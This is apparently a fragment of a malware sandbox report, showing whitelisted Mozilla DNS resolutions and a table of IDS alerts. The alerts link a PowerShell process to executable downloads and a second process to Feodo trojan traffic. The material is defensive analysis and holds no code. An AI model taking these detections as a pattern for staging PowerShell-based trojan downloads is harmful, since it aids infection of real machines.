  • 35.160.41.125
  • 52.26.103.165
  • 54.187.46.234
  • 54.186.163.246
  • 52.88.30.0
whitelisted
tiles.r53-2.services.mozilla.com
  • 52.26.103.165
  • 35.160.41.125
  • 52.25.70.97
  • 34.218.217.119
  • 34.216.156.21
  • 34.209.108.219
  • 34.208.7.98
  • 34.208.103.195
  • 54.187.46.234
  • 52.88.30.0
  • 54.186.163.246
whitelisted
snippets.cdn.mozilla.net
  • 143.204.8.62
whitelisted

Threats

PID
Process
Class
Message
4056
PoWersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4056
PoWersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4056
PoWersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3808
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3808
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2 ETPRO signatures available at the full report
No debug info